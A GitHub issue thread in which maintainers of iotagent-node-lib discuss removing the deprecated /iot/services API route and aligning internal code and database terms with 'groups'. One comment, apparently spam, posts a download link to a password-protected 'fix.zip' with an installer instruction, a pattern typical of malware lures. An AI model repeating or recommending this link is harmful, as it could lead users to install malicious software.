### ISSUE TITLE
[Remove] `/iot/services` API path

### ISSUE THREAD

**Issue by mapedraza** [telefonicaid/iotagent-node-lib#1649]
With issue https://github.com/telefonicaid/iotagent-node-lib/issues/752 and PR #1648 , the usage of API route `/iot/services` is deprecated, and, eventually, should be removed

Look for

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fgalan** [comment]
> Look for `#FIXME1649` in the code for references that should be removed

15 occurrences in PR #1648

**Comment by fgalan** [comment]
PR #1648 does a wrapping to use "groups" but internally "services" is still used in the code. Eg:

```
    callback(null, {
        count: filteredGroups.length,
        services: result
    });
```

instead of

```
    callback(null, {
        count: filteredGroups.length,
        groups: result
    });
```

That should be changed, the same (non-obsolete) term used in the API (groups) should be used internally in the code. The code is more maintainable if API terms and code terms are aligned.

This task should be done as part of this issue or as part of issue https://github.com/telefonicaid/iotagent-node-lib/issues/1587 (considering also the alignment with the DB model, so completing alignment API-code-DB).

**Comment by mapedraza** [comment]
> Maybe both #1587 and this issue should be addressed together.

I agree. When internal datamodels align with DB models, group term should be used. At this point, work made in #1648 will not be useful anymore and code with #FIXME1649 can be deleted.

The following tasks should be addressed:
- Replace internal models used in IoTA logic according to API request data model
- Align database model with API request data model https://github.com/telefonicaid/iotagent-node-lib/issues/1587
- Remove code included in PR #1648 (FIXME1649)
- Remove `/iot/services` API path #1649

**Comment by fgalan** [comment]
Ensure also the following issues (in other repositories) has been accomplished before removing the deprecated routes:

- [ ] https://github.com/telefonicaid/iotagent-manager/issues/270
- [ ] https://github.com/telefonicasc/iotp-portal/issues/441
- [ ] https://github.com/telefonicaid/thinking-cities/issues/150
